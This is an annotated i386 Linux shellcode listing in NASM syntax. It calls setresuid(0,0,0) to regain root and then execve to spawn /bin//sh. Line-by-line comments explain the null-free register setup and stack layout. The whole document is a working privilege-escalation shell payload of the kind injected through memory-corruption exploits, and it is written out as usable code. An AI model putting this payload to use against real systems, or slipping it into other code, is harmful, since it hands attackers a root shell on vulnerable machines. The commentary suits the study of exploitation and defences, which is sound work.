  1. BITS 32
  2. ; Linux i386, NASM syntax. int 0x80 takes the syscall number in eax and the first three args in ebx, ecx, edx.
  3. ; setresuid(uid_t ruid, uid_t euid, uid_t suid);
  4.   xor eax, eax      ; eax = 0; the syscall number is written into al below
  5.   xor ebx, ebx      ; ebx = 0 -> ruid argument
  6.   xor ecx, ecx      ; ecx = 0 -> euid argument; reused further down as the source of zero dwords
  7.   cdq               ; sign-extend eax into edx; eax is 0 here, so edx = 0 -> suid argument
  8.   mov BYTE al, 0xa4 ; eax = 164 (0xa4) = setresuid on i386; the upper 24 bits are still zero from the xor
  9.   int 0x80          ; setresuid(0, 0, 0); the return value left in eax is never checked
  10. ; NOTE: without CAP_SETUID the call above succeeds only while the real, effective or saved UID is still 0, so a program that has dropped all three permanently is unaffected.
  11. ; execve(const char *filename, char *const argv [], char *const envp[])
  12.   push BYTE 11      ; push the immediate 11 as a sign-extended dword
  13.   pop eax           ; eax = 11 = execve on i386; replaces the whole register, which held setresuid's result
  14.   push ecx          ; zero dword = NUL terminator for the path (relies on ecx still being 0 after the syscall)
  15.   push 0x68732f2f   ; "//sh" in little-endian byte order; the doubled slash pads the path to two full dwords
  16.   push 0x6e69622f   ; "/bin" in little-endian byte order; the stack now holds "/bin//sh" followed by NUL
  17.   mov ebx, esp      ; ebx = address of "/bin//sh" -> filename argument
  18.   push ecx          ; zero dword that serves both as envp[0] and as argv[1]
  19.   mov edx, esp      ; edx -> that zero dword, i.e. envp = [NULL]
  20.   push ebx          ; argv[0] = pointer to the path, stored at the address just below the NULL dword
  21.   mov ecx, esp      ; ecx -> argv = [pointer to "/bin//sh", NULL]
  22.   int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL]); no instruction follows, so a failed execve falls off the end